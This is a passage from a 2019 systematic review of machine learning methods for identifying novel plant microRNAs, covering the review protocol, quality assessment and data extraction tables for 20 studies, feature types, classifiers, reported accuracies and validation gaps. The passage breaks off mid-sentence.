ACCESS Computational methods for the ab initio identification of novel microRNA in plants: a systematic review Buwani Manuweera1, Gillian Reynolds1,2 and Indika Kahanda1 1 Gianforte School of Computing, Montana State University, Bozeman, MT, United States of America 2 Department of Plant Sciences and Plant Pathology, Montana State University, Bozeman, MT, United States of America ABSTRACT Background. MicroRNAs (miRNAs) play a vital role as post-transcriptional regulators in gene expression. Experimental determination of miRNA sequence and structure is both expensive and time consuming. The next-generation sequencing revolution, which facilitated the rapid accumulation of biological data has brought biology into the ‘‘big data’’ domain. As such, developing computational methods to predict miRNAs has become an active area of inter-disciplinary research. Objective. The objective of this systematic review is to focus on the developments of ab initio plant miRNA identification methods over the last decade. Data sources. Five databases were searched for relevant articles, according to a well- defined review protocol. Study selection. The search results were further filtered using the selection criteria that only included studies on novel plant miRNA identification using machine learning. Data extraction. Relevant data from each study were extracted in order to carry out an analysis on their methodologies and findings. Results. Results depict that in the last decade, there were 20 articles published on novel miRNA identification methods in plants of which only 11 of them were primarily focused on plant microRNA identification. Our findings suggest a need for more stringent plant-focused miRNA identification studies. Conclusion. Overall, the study accuracies are of a satisfactory level, although they may generate a considerable number of false negatives. In future, attention must be paid to the biological plausibility of computationally identified miRNAs to prevent further propagation of biologically questionable miRNA sequences. Subjects Bioinformatics, Computational Biology Keywords ab initio, microRNA, Plant, Machine learning, Systematic review INTRODUCTION microRNAs (miRNAs) are a large family of small (approx. 20–25 nucleotides) single- stranded RNAs, involved in post-transcriptional gene regulation through the cleavage and/or inhibition of target mRNAs (Rogers & Chen, 2013; Voinnet, 2009). Despite being found throughout the eukaryotic kingdom, plant microRNAs differ from their metazoan counterparts in a number of ways, including their genomic loci (regions in which their genes can be found i.e., introns, UTRs, etc.), biogenesis, length, methods of target recognition How to cite this article Manuweera B, Reynolds G, Kahanda I. 2019. Computational methods for the ab initio identification of novel mi- croRNA in plants: a systematic review. PeerJ Comput. Sci. 5:e233 http://doi.org/10.7717/peerj-cs.233 https://peerj.com/computer-science mailto:indika.kahanda@montana.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.233 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.233 and number of targets per miRNA molecule (Axtell, Westholm & Lai, 2011; Moran et al., 2017). Computationally, plant and animal miRNAs can be differentiated through several distinguishing characteristics such as helix number, stack number, length of pre-miRNA and minimum free energy (Zhu et al., 2016). Indeed, it is currently uncertain if plant and animal microRNAs share a common origin or if they evolved independently in both lineages (Axtell, Westholm & Lai, 2011; Moran et al., 2017; Zhang et al., 2018). Despite the uncertainty regarding their origin, it has never been more important for the focused characterization of plant microRNAs. Production levels for many of the world’s crops are under threat from increases in global temperatures, changing patterns of rainfall and extreme weather events such as droughts, heatwaves and heavy rainfall (Mall, Gupta & Sonkar, 2017). A meta-analysis of over 1,700 simulations for wheat, rice and maize has indicated that an increase of just 2 degrees will cause losses in aggregate production (Challinor et al., 2014). Between 2030–2052, the Intergovernmental Panel on Climate Change (IPCC) reports with high confidence that global temperature increases of 1.5 degrees is likely to become a reality if current rates of temperature changes are maintained (Hoegh Guldberg et al., 2018). Although this will result in smaller net reductions for maize, rice, wheat and potentially other cereal crops than would be observed with a 2 degree rise, the risk to global food security and economics is not to be overlooked, especially regarding staple crops such as wheat, that are required to increase in production levels to meet projected increases in global demands (Liu et al., 2016; Ray et al., 2013; Hoegh Guldberg et al., 2018; Challinor et al., 2014). miRNAs are known to be involved in several important stress-response pathways including drought, heat and salinity. For example, in the model plant Arabidopsis thaliana, upregulation of miR389 is critical for thermotolerance (Guan et al., 2013), downregulation of miR169 is observed in drought-tolerant varieties and overexpression of osa-MIR396c inferred increased salt and alkali tolerance (Gao et al., 2010). However, it has become clear that plant species show remarkable variety in the relationship between miRNAs and their role in stress tolerance. For example, osa-MIR396c in rice (Oryza sativa) showed the same response as A. thaliana in increased salinity and alkaline environments (Gao et al., 2010). However, for other miRNAs such as miR169 the relationship between their expression and drought tolerance appears to vary between species. In A. thaliana and the model legume Medicago truncatula, miR169 is down-regulated in response to drought (Li et al., 2008; Trindade et al., 2010; Sunkar, Li & Jagadeeswaran, 2012). Contrastingly, in rice and tomato (Solanum lycopersicum cv. Ailsa Craig), drought stress led to the up-regulation of miR-169 (Zhao et al., 2007; Zhang et al., 2011). Additionally (Zhou et al., 2010) identified a further 9 miRNAs that showed opposite expression patterns in A.thaliana in response to drought stress. The observed interspecies variation in miRNA activity in response to stressful stimuli demonstrates that there is a need for the discovery and functional characterization of miRNAs for each species of plant of interest. Thanks to advancements in next-generation sequencing (NGS) technology and interdisciplinary collaborations, the rapid identification of species-specific plant miRNAs and their expressions in response to stimuli is now possible (Liu et al., 2012; Unamba, Nag & Sharma, 2015; Hu, Lan & Miller, 2017). NGS is both high throughput and highly Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 2/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 accurate, facilitating the identification of sequence variations and novel miRNAs (Hu, Lan & Miller, 2017). However, many computational methods such as those described in (Evers et al., 2015; An et al., 2014; Hackenberg, Rodriguez-Ezpeleta & Aransay, 2011) only allow for homology-based identification of miRNAs. This means the tools are not able to take full advantage of the available information in the sequencing data, such as novel miRNA identification. As such, numerous ab initio methods have been developed to facilitate the discovery of novel miRNAs. However, caution is being urged when interpreting the results of such computational inferences of biological data (Taylor et al., 2017; Taylor et al., 2014). The generation of computational tools to identify miRNA sequences requires biological assumptions to underpin the methods and, as with all new areas of research, these assumptions change with new evidence over time (Ambros et al., 2003; Meyers et al., 2008; Axtell & Meyers, 2018). This systematic review surveys the computational methods that facilitate the ab initio identification of plant miRNAs over the last decade (2008–2018). It seeks answers to five research questions that aim to elucidate the developments, reliability and validity of the methods used, and considers potential opportunities for future developments in the computational identification of miRNAs. METHODOLOGY This systematic review focuses on the literature that was published between 2008 and 2018. This time range was considered to collect and analyze the recent methodologies developed on ab initio plant miRNA identification. The following sections contain the steps of the review protocol: research questions, search strategy, selection criteria, data extraction and quality assessment. Research questions This review is intended to answer the following research questions: (Q1) How many methods were developed during the past decade? (Q2) What kind of machine learning algorithms and features were used? Which models/features performed well? (Q3) How accurate and reliable are the developed models? (Q4) What kind of computational and/or experimental validation methods were used? How appropriate are those validation methods? (Q5) What are knowledge gaps, open problems and/or opportunities? Search strategy The search strategy was used to identify plant miRNA prediction methods developed between 2008 and 2018 in databases of IEEE Xplore (https://ieeexplore.ieee.org/Xplore/ home.jsp), Science Direct (https://www.sciencedirect.com/), PubMed (https://www.ncbi. nlm.nih.gov/pubmed?otool=msubolib), Web of Science (http://www.webofknowledge. com/) and Google Scholar (https://scholar.google.com/). The following terms were used for the literature searches: ‘‘novel miRNA identification in plants’’ (including variations of the word ‘‘identification’’ such as ‘‘prediction’’ and ‘‘discovery’’) and ‘‘computational method’’. They were used as queries as shown below. Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 3/25 https://peerj.com https://ieeexplore.ieee.org/Xplore/home.jsp https://ieeexplore.ieee.org/Xplore/home.jsp https://www.sciencedirect.com/ https://www.ncbi.nlm.nih.gov/pubmed?otool=msubolib https://www.ncbi.nlm.nih.gov/pubmed?otool=msubolib http://www.webofknowledge.com/ http://www.webofknowledge.com/ https://scholar.google.com/ http://dx.doi.org/10.7717/peerj-cs.233 Table 1 Article selection criteria. Inclusion criteria Exclusion criteria Studies that use machine learning algorithms Studies that only use sequence homology Studies that solely use plants or include plant data Studies that use animal or unspecified species datasets Published journal articles or conference proceedings Literature reviews/surveys on the subject and unpublished articles (novel miRNA identification in plants) AND (computational method) These search terms were utilized to narrow down the large number of mostly-irrelevant retrieved articles from databases such as Science Direct and Google Scholar, into mostly relevant articles. Selection criteria The selection criteria used for the review is shown in Table 1. The review process began with a study search procedure. From the initial search results to the final list of primary studies, the procedure was performed as follows. 1. The article search was carried out using the aforementioned search strategy mentioned above. A total of 2,738 search results were found from all of the databases. That is considering only 300 search results from Google Scholar as it gave over 18,000 results per search term. In order to narrow-down from 18,000 Google Scholar results, we restricted the output to the first ten pages of the search. This resulted in 300 articles that are most relevant to the query. • IEEE Xplore: 116 • Science Direct: 2140 • PubMed: 116 • Web of Science: 66 • Google Scholar: 300 2. Out of the search results from the databases, articles were first filtered by assessing the title’s relevance. If deemed relevant to the subject, it was included in the initial list. 3. Secondly, the abstracts were assessed for relevance. This resulted in 41 articles. 4. Finally, the selection criteria (see Table 1) were applied on the remaining 41 articles and 20 articles were retained as the final list (referred to as the primary list). Data extraction Table 2 outlines the criteria used for data extraction from the 20 primary studies. Data and general information from each article were extracted to enable the five research questions to be addressed (see Research Questions). Quality assessment The study quality assessment was performed on all 20 primary studies and was based on six questions as detailed: Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 4/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Table 2 Data extraction form. Search focus Data item Description Article Details Title, Authors, Published year and publication venue Article Type Journal article or conference proceedingsGeneral Study Description Introduction of the study Q1 Data Plant data only methods and methods including plant data Datasets Dataset source, positive and negative example datasets, and species Features Types of features used Machine Learning Algorithms Type of machine learning algorithm used for classification Q2 Feature Selection Methods used to select/extract features for the model Q3 Performance Metrics Accuracy values and other performance measurements Q4 Validation Methods Cross-validation and Experimental validation methods Q5 Future Work Suggested future work in Conclusion section and other aspects that are not being addressed (QA1) Are all the considered data being used for the model (without sample selection)? A ‘‘sample’’ refers to a single miRNA sequence considered for the experiments. In machine learning, they are also referred to as an example or an instance of data. (QA2) Do they mention any information about the negative dataset used? A typical machine learning model require positive and negative examples, which are sequences labeled as miRNAs or none-miRNAs, respectively. This question refers to any information about the negative dataset such as what kind of sequences were considered as negatives and how many examples were considered. (QA3) Are there any feature selection methods considered in each method? Rather than using all the features gathered, did the study use a feature selection method to select a subset of most effective features for model development. (QA4) Do they conduct any experimental validation of their findings? Did the study use validation methods to experimentally validate the findings (miRNA predictions) output from their machine learning models. (QA5) Are the results of the performance evaluation quantified? Did the study present their results using a typical performance measure such as accuracy used in machine learning. (QA6) Is the study focused only on plant miRNA identification? Did the study solely use plant miRNA sequences for developing the prediction model or have they considered a mixture of plant and animal miRNAs. RESULTS Figure 1 is the flow diagram depicting the study selection process with the numbers described in the methodology (Liberati et al., 2009). Table 3 illustrates the results of the quality assessment process. None of the articles answered ‘‘Yes’’ to all the six questions. Zou et al. (2014) does not satisfy any quality Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 5/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Figure 1 PRISMA Flow Diagram (Liberati et al., 2009). Full-size DOI: 10.7717/peerjcs.233/fig-1 assessment category, but it is still considered for the systematic review in order to analyze their methodology. Tables 4 and 5 shows the information collected from the primary studies during the data extraction process. Table S2 shows the publication venues of the primary articles. According to the table, BMC Bioinformatics journal has the most number of articles selected. The answers to all the research questions are being presented below based on the primary studies selected. (Q1) How many methods were developed during the past decade? The primary list of articles consisted of 20 studies which were focused on the problem of novel plant miRNA identification. Of these, 11 studies were focused solely on plant miRNA identification. The remaining studies focused on both plant and animal miRNA identification, with plant datasets either used to train the machine learning models or used only to test the model (after training with non-plant datasets). The plant-focused studies used datasets from several different species. Meng et al. (2014) considered all the plant datasets available in miRBase (a miRNA database) by (Kozomara & Griffiths-Jones, 2014). Breakfield et al., 2012; Silla, De O Camargo-Brunetto & Binneck, 2010 and Sunkar et al., 2008, each worked on one specific plant species (Arabidopsis, soybean Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 6/25 https://peerj.com https://doi.org/10.7717/peerjcs.233/fig-1 http://dx.doi.org/10.7717/peerj-cs.233#supp-2 http://dx.doi.org/10.7717/peerj-cs.233 Table 3 Quality assessment results. Reference QA1 QA2 QA3 QA4 QA5 QA6 Tseng et al. (2018) No Yes Yes Yes Yes Yes Yousef et al. (2016) Yes Yes Yes No Yes Yes Yousef, Allmer & Khalifa (2015) Yes Yes Yes No Yes Yes Breakfield et al. (2012) No Yes No Yes Yes Yes Douglass et al. (2016) No Yes No Yes Yes Yes Sunkar et al. (2008) No Yes Yes Yes No Yes Abu-halaweh & Harrison (2010) Yes Yes Yes No Yes No Guan et al. (2011) Yes Yes Yes No Yes No Meng et al. (2014) No Yes Yes No Yes Yes Williams, Eyles & Weiller (2012) No Yes Yes No Yes Yes Xuan et al. (2011) No Yes Yes No Yes Yes Yao et al. (2016) Yes Yes No No Yes Yes Koh & Kim (2017) Yes Yes No No Yes No Silla, De O Camargo-Brunetto & Binneck (2010) No Yes No No Yes Yes Wu et al. (2011) No Yes Yes No Yes No Zhong et al. (2015) Yes Yes No No Yes No Kadri, Hinman & Benos (2009) No Yes No No Yes No Vitsios et al. (2017) Yes No No No Yes No Xiao et al. (2011) No Yes No No Yes No Zou et al. (2014) No No No No No No and rice respectively). Therefore, they used only that plant species or included a few additional species to the dataset. As there is not an abundance of species-specific miRNA data available, most studies used a combination of plant species data. The primary list contains nine studies that used both plant and animal datasets. These studies used the same features for both kingdoms miRNA identification. This might be due to the lack of data in plants. Therefore, researchers tend to combine animal datasets in order to get a larger dataset, and they consider the same features. This results in a number of tools that are for both animals and plants that do not consider the differences between their miRNAs. Figure 2 shows the distribution of article publication on the subject in the past decade. Most plant only publications occurred in 2016 and 2013, no publication was published on novel plant miRNA identification. Figure 3 shows the distribution of specific plant species used in the primary studies. All the studies used both positive and negative datasets in their methods. Whilst plant miRNA data was used for the positive set, a range of data was used for the negative set, ensuring they were free of real miRNA sequences. Nine studies used protein coding regions to collect pseudo miRNAs for their negative dataset. As almost all reported miRNAs are found in the non-coding regions of the genome, these sequences are assumed as pseudo miRNA data (Xuan et al., 2011). Guan et al. (2011), Koh & Kim (2017), Xiao et al. (2011), Yousef, Allmer & Khalifa (2015) and Yousef et al. (2016) used the negative datasets from Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 7/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Table 4 Data extraction results. Primary study Article type Data Dataset source Number of species used Negative datasets Feature selection methods Xuan et al. (2011) J P miRBase 14, Phyto- zome 6 database 29 Protein coding re- gion of A.thaliana and G.max genomes Considering informa- tion gain and feature redundancy Yousef et al. (2016) J P miRBase 20, 21 5 in Brassicaceae and training data from Xuan et al. (2011) Samples from Xuan et al. (2011) Using SVM-RFE (Re- cursive feature elimina- tion) implemented in WEKA, selected top 60 ranked features. Silla, De O Camargo-Brunetto & Binneck (2010) C P Plant MicroRNA Database, deepBase, Phytozome 131 Glycine max, 199 Athaliana, 100 Med- icago truncatula 175 Arabidopsis thaliana snoRNA sequences from deepBase2 and 225 RNA sequences randomly generated N/A Meng et al. (2014) J P miRBase 19 From coding regions of 3 species Using Back SVM-RFE, 47/152 features were selected Breakfield et al. (2012) J P miRBase 16, NCBI Se- quence Read Archive Arabidopsis From intergenic or in- tronic genomic loca- tions N/A Douglass et al. (2016) J P miRBase 21, Gene Ex- pression Omnibus (GEO) 4 smRNA sequences re- maining after known miRNA filtering N/A Yao et al. (2016) J P miRBase 21, Ensem- blPlants database v18 9 From coding region of 5 species Selected subsets of fea- tures (based on types of features) to check the impact of those fea- tures Tseng et al. (2018) J P miRBase 21, Gene Ex- pression Omnibus, TAIR, RGAP Arabidopsis and Rice Tested with different combinations of fea- tures (based on type) Williams, Eyles & Weiller (2012) J P miRBase 18, TIGR Plant Transcript As- semblies 18 From Expressed Se- quence Tags (EST) of 18 species N/A Sunkar et al. (2008) J P miRBase 9, TIGR Rice Genome Annotation Database Rice Rice coding sequences from TIGR Wrapper-based method. Using weights from SVM (continued on next page) M anuw eera etal. (2019),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.233 8/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Table 4 (continued) Primary study Article type Data Dataset source Number of species used Negative datasets Feature selection methods Yousef, Allmer & Khalifa (2015) J P miRBase 20, 21 8 From Xuan et al. (2011) Using SVM-RFE (Re- cursive feature elemi- nation) implemented in WEKA, selected top 60 ranked features. Xiao et al. (2011) J Eval: P+V miRBase 14 All miRBase 14 From previous work (Human data) N/A Koh & Kim (2017) J A+P miRBase 21 miRBase21 excluding virus Pseudo hairpins form microPred N/A Wu et al. (2011) J A+P miRBase 13 All miRBase 13 Random start sequences; identical to real miRNA but start position is shifted by 5nt Tested for the 10 high- est raninking features Zou et al. (2014) J A+P miRBase 19 All miRBase 19 Tested on different fea- ture sets Zhong et al. (2015) J A+P Previous studies (miR- Base 12, 14, 17) From previous studies Previous methods N/A Guan et al. (2011) J A+P miRBAse 12 From protien coding regions (from previous studies) N/A Vitsios et al. (2017) J A+P miRBase 15 N/A Abu-halaweh & Harrison (2010) C A+P previous work (Rfam 5 etc.) 12 Human coding regions FDT integrates two measures, Classifica- tion Ambiguity and Fuzzy Information Gain to identify the set of the most significant features Kadri, Hinman & Benos (2009) J Test set: P microRNA registry v10.1, UCSC genome browser 2 Coding regions and random genomic seg- ments from genome obtained by UCSC genome browser N/A Notes. J, Journal; C, Conference proceeding; P, Plant; A, Animal; V, Virus; N/A, Feature selection not used. M anuw eera etal. (2019),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.233 9/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Table 5 Data extraction results (2). Primary study Input Types of features Types of ML models Predicted output Key results Experimental validation Sequence Structural Thermodynamic/ Stability Other Discriminative Probabilistic P re ci si on R ec al l F1 -s co re Sp ec if ic it y G eo m et ri c m ea n A cc u ra cy A U C Xuan et al. (2011) pre-miRNA 17 64 triplet 34 SVM - RBF Kernel pre-miRNA 91.93 97.84 94.84 94.39 Yousef et al. (2016) pre-miRNA existing; motif features existing existing SVM - RBF Kernel pre-miRNA 98.8 100 99.48 0.994 Silla, De O Camargo-Brunetto & Binneck (2010) pre-miRNA 17 12 SVM - RBF Kernel pre-miRNA 89 95 92 Meng et al. (2014) pre-miRNA and mature miRNA 20 96 29 SVM pre-miRNA and mature miRNA 95.5 98.82 97.16 97.16 Breakfield et al. (2012) small RNA 15 including all types Naïve Baye’s Mature miRNA vs nc- RNA 91.7 99.9 RT-PCR etc. Douglass et al. (2016) small RNA Naïve Baye’s mature miRNA 0.998 RT-PCR Yao et al. (2016) pre-miRNA Including all types SVM - RBF Kernel pre-miRNA 92.61 98.88 96.56 0.9,885 Tseng et al. (2018) small RNA 1 183 1 SVM mature miRNA 95.22 98.15 95.07 96.61 RT-PCR Williams, Eyles & Weiller (2012) mature miRNA 22 4 3 Decision Tree mature miRNA 84.08 98.53 Sunkar et al. (2008) small RNA 4 to 9-mer seq. motifs SVM - Linear mature miRNA Northern analysis Yousef, Allmer & Khalifa (2015) pre-miRNA n-grams, motifs SVM and K-means mature miRNA 91.4 Xiao et al. (2011) pre-miRNA 24 network features of stem-loop Random Forest pre-miRNA 87.3 91.1 97.6 0.956 Koh & Kim (2017) pre-miRNA 17 12 SVM - RBF Kernal pre-miRNA 96 94.68 Wu et al. (2011) pri-miRNA 6,5,5 mature, pre, pri-mirna 9,5,5 mature, pre, pri-mirna 1,1,1 mature, pre, pri-mirna 30 other features SVM mature miRNA regions 80 Zou et al. (2014) mature miRNA 4,096 32 triplet Random Forest mature miRNA and their family Zhong et al. (2015) pre-miRNA 81 49 9 SVM pre-miRNA 93.37 97.91 95.61 Guan et al. (2011) pre-miRNA misc. covering all types ADABoost pre-miRNA and mature miRNA 94.32 97.11 96 97.54 Vitsios et al. (2017) mature miRNA 33 covering all types Random Forest Mature miRNA 71.4- 71.8 Abu-halaweh & Harrison (2010) pre-miRNA Including all types Fuzzy Decision Tree pre-miRNA 91.5 94.7 94.2 Kadri, Hinman & Benos (2009) pre-miRNA 4 parameters Hierarchical HMM pre-miRNA 84 88 Notes. F1 Score, 2*(Precision*Recall)/(Precision+Recall); Geometric Mean, Sensitivity*Specificity. M anuw eera etal. (2019),P eerJ C om put. S ci.,D O I10.7717/peerj-cs.233 10/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Figure 2 Distribution of publications in the past decade. . Full-size DOI: 10.7717/peerjcs.233/fig-2 Figure 3 Plant species used (even though Arabidopsis belongs to the Brassicaceae family, it has been used in significant amount of work as it is a model plant; therefore, it has been added to the figure sepa- rate from Brassicaceae). Full-size DOI: 10.7717/peerjcs.233/fig-3 Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 11/25 https://peerj.com https://doi.org/10.7717/peerjcs.233/fig-2 https://doi.org/10.7717/peerjcs.233/fig-3 http://dx.doi.org/10.7717/peerj-cs.233 previous studies which were already available. Yousef, Allmer & Khalifa (2015) discusses a one-class classifier for plant miRNAs where they only used the positive data set. However, for the comparison with a binary classifier, they needed a negative dataset. The remaining studies either randomly generated negative datasets or used other non-coding RNAs such as small nucleolar RNA (snoRNA), transfer RNA (tRNA) etc. (Q2) What kind of machine learning algorithms and features were used? Which model- s/features performed well? Many of the studies used the same or similar sets of features consisting of sequence-based, structural and thermodynamic features. The studies use either the same set of features from previous studies or extend them by adding new features to enhance performance. The sequence-based features often consist of nucleotide/di-nucleotide frequencies, motifs, n-grams, GC content and sequence length among others. The structural features primarily consist of features as described in Xue et al. (2005) and also minimum free energy (MFE) measures. Thermodynamic features include the structure entropy and enthalpy measures. The vast majority of studies utilize a combination of various structural and sequence-based features which may aid in increasing the chances of identifying a correct miRNA, despite their diversity within the plant kingdom. Williams, Eyles & Weiller (2012) and Kadri, Hinman & Benos (2009) have used sliding windows of size ranging 300–500 nt (known plant pre-miRNA are below 300 nt according to Williams, Eyles & Weiller (2012) and for Kadri, Hinman & Benos (2009), most of the pre-miRNA were covered when the window size is 500 nt) to scan genome sequences for folding into hairpin structures and then collect structural features. Therefore, this range can be used for scanning the whole genome of a specific plant spices. Plant precursor sequences have varying sizes of secondary structures but there is no unified technique reported for dealing with the issue. Williams, Eyles & Weiller (2012) select the size of the majority of pre-miRNA in miRBase (<300 nt). Kadri, Hinman & Benos (2009) use 50 nt minimum for selecting/ filtering pre-miRNAs. Xuan et al. (2011) considered different ranges of lengths to get the majority of sequence information. Wu et al. (2011) used 100 nt as the length of pre-miRNA. According to Meng et al. (2014), plant pre-miRNA can range from 53–938 nt. Therefore, many of the studies have used a window size that is being guided by this length range to select the set of pre-miRNA for their studies. Apart from those features, Xiao et al. (2011) focused on other methods to achieve structural features using network parameters. A few remaining studies haven’t described the feature set with adequate information. But most of the studies tend to follow the same set of features which were proven to be effective through previous studies. Figure 4 shows the distribution of types of features used in the primary studies. Different studies have been conducted to show the impact of different sets of features. Some methods show that thermodynamic features (Yao et al., 2016) are better while another reports that sequential features (Yousef et al., 2016) are better. However, there is no concrete answer or common theme since there aren’t many studies comparing different feature types for plant miRNA prediction. Whilst most studies utilized features extracted from data generated from various plant species, a few did use features extracted from non-plant species and then used this data Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 12/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 Figure 4 Types of features used. Full-size DOI: 10.7717/peerjcs.233/fig-4 to test their models’ performance on other species. Both Guan et al. (2011) and Kadri, Hinman & Benos (2009) used human miRNA data to train their models and then tested model performance on several plant species including the model plant species Arabidopsis thaliana as well as Oryza sativa. Both methods performed well on these species, with (Kadri, Hinman & Benos, 2009) achieving 97.4% and 85.7% of correctly predicted miRNA for A.thaliana and O.sativa respectively. Guan et al. (2011) was able to achieve 96.53% accuracy for A.thaliana and 97.61% for O.sativa as well an impressive 100% accuracy for Chlamydomonas reinhardtii. Similarly, (Vitsios et al., 2017) demonstrated an accuracy of between 90.7% and 82.9% for the identification of plant miRNAs using a model trained on animals. Xiao et al. (2011) was also able to achieve similar results in the detection of miRNA precursors trained on animal data, demonstrating an accuracy of 97.6% for plant data. The success of these studies indicates that plant and animal miRNAs do share some conserved sequence and structural characteristics. The studies considered in this review all used machine learning algorithms to identify novel miRNAs in plant species. The selected primary studies used the following machine learning algorithms in their methods. • Support Vector Machine (SVM) (Kecman, 2005) • Random Forest (Breiman, 2001) • Naive Bayes (Runkler, 2012) • Decision Tree (Swain & Hauska, 1977) • Hierarchical Hidden Markov Model (HHMM) (Fine, Singer & Tishby, 1998) Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 13/25 https://peerj.com https://doi.org/10.7717/peerjcs.233/fig-4 http://dx.doi.org/10.7717/peerj-cs.233 Figure 5 Machine learning algorithms used. Full-size DOI: 10.7717/peerjcs.233/fig-5 • ADABoost (Freund & Schapire, 1999) Out of the above algorithms, 11 studies used SVM for their model. In general, models using SVMs have provided good overall performances in miRNA identification. Three other studies used Random Forest algorithm. The machine learning algorithms used are limited to the above list in the past decade. Figure 5 shows the distribution of machine leaning algorithms used in the past decade on identifying novel miRNAs in plants. The inputs to these machine learning models consist of either pre-miRNA, mature miRNA or small RNA sequences. Meng et al. (2014) used both pre-miRNA and mature miRNA as the inputs to develop an integrated model for both miRNA and pre-miRNA prediction. Methods such as (Tseng et al., 2018; Douglass et al., 2016; Breakfield et al., 2012) used small-RNA sequencing data for their models. These methods still output the predicted miRNAs. (Q3) How accurate and reliable are the developed models? Considering the overall results reported by the authors, almost all the methods performed well in identifying novel plant miRNAs –many of them achieved very good accuracy values. Most of the studies used accuracy, recall, sensitivity and specificity to illustrate the performance of the model. Eleven studies used accuracy as a performance measure and 10 of those studies achieved accuracies above 90%. Even though the reported performances are not directly comparable, the highest accuracy of 99.48% was reported by Yousef et al., Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 14/25 https://peerj.com https://doi.org/10.7717/peerjcs.233/fig-5 http://dx.doi.org/10.7717/peerj-cs.233 (2016). Considering the results presented by each study, all of them performed well and therefore, are seemingly reliable. All of the plant only methods perform well with accuracy values of above 90%. These performance values are based on the considered specific plant species and may not work for any species. Also, there is a potential for improving the performances by considering feature selection and advanced machines learning techniques. Note that the analysis presented here is only based on the performances reported by the authors. While it may look like that many models are performing very well with performance values above 90%, we would like to highlight the fact that more than 90% of the models are developed/ tested with/on plant species with relatively less complex genomes such as A. thaliana (see Fig. 3). Therefore, we raise the concern that these models may not work for more complex plant genomes such as Wheat. With the recent sequencing of the whole wheat genome, identifying novel miRNAs and their functions is of utmost importance. But none of the existing methods reviewed in this survey focuses on complex plant species. The lack of high-quality plant data in popular knowledgebases such as miRBase (Kozomara, Birgaoanu & Griffiths-Jones, 2019) (which leads to lack of adequate training data) may be hindering the bioinformatics community from developing plant-based models for complex plant genomes. (Q4) What kind of computational and/or experimental validation methods were used? How appropriate are those validation methods? Except for two studies, all the other studies used a cross-validation technique for evaluating their machine learning models. Five-fold cross validation was used by eight studies while six studies used 10-fold cross validation. Using cross validation is helpful in performance evaluation of the developed models. Experimental validation of putative novel miRNA’s is an important part of miRNA prediction. Of the 20 studies evaluated in this systematic review, only four (Tseng et al., 2018; Breakfield et al., 2012; Douglass et al., 2016; Sunkar et al., 2008) experimentally validated the presence of the novel miRNAs predicted by their machine learning methods. The most popular method was stem-loop PCR, employed by Tseng et al. (2018), Breakfield et al. (2012) and Douglass et al., 2016). Tseng et al. (2018) additionally utilized qPCR and (Sunkar et al., 2008) employed Northern blot analysis and small RNA blots. (Tseng et al., 2018) confirmed 18 out of 21 predicted miRNAs to be real miRNAs while (Sunkar et al., 2008) has tested and confirmed seven out of 13 predicted miRNAs. Breakfield et al. (2012) and Douglass et al. (2016) experimentally validated 8 of their predictions each to be true miRNAs. (Q5) What are knowledge gaps, open problems and/or opportunities? Computational miRNA identification is still a relatively young branch of biology and as such, it contains many knowledge gaps, open problems and opportunities. However, one of the most pressing is the need for the biological validation of computationally predicted miRNAs. It’s become clear from studies conducted by Axtell & Meyers (2018), Taylor et al. (2014) and Taylor et al. (2017) that many of the miRNA sequences deposited in databases such as miRBase (Kozomara & Griffiths-Jones, 2014) are biologically implausible. Taylor et Manuweera et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.233 15/25 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.233 al. (2014) labeled one-third of all annotation plant miRNA loci and 75% of all plant miRNA families as questionable in miRBase release 20 (Kozomara & Griffiths-Jones, 2014). Similarly, (Axtell & Meyers, 2018) found that only 8.5% of land plant miRNA loci and 9.4% of land plant families are labeled as high confidence in miRBase version 21 (Kozomara & Griffiths-Jones, 2014). Whilst there are many factors responsible for these observations, one of the causes may simply be developments in the understanding of miRNA biology. The last ten years have seen the release of two guidelines for the identification of plant miRNA identification, one of which was released in 2008 and the other in 2018 (Meyers et al., 2008; Axtell & Meyers, 2018). Prior to these releases, the first miRNA identification guide was produced in 2003 (Ambros et al., 2003). As all computational identification methods are based upon biological assumptions, it stands to reason that the use of tools that are based on inaccurate or out-of-date assumptions will yield biologically questionable results. Whilst this unmistakably calls for researchers to thoroughly inspect the methods of their chosen tools to discern the assumptions upon which it is based, this is not always a straightforward task. Most of the tools in this study made no reference to a specific guideline that was followed, which is of course not a necessity and in some cases would be inappropriate. The sources used may indeed be in accordance with the most recent guidelines or they may be expanding upon those guidelines, such as performed in Yousef, Allmer & Khalifa (2015), who investigated motif-based features for ab initio plant miRNA detection. Additionally, if there have been developments in the understanding of miRNA biology that have succeeded the information in the guidelines, it would, of course, make little sense to blindly abide by the guidelines. An additional complication is a lack of clarity in the methods. These tools are both biologically and computationally complex, and understanding the methods that underlie them may not be a straightforward task for experts of various domains. There is a need to ensure that the methods of such tools are written in such a way as to make clear the underlying assumptions. Failure to do so could lead to a tool being inappropriately selected, disregarded or improperly used. In some cases, this will require the user of such tools to read the proceeding studies that have been referenced in place of the method specifics. Another cause of the 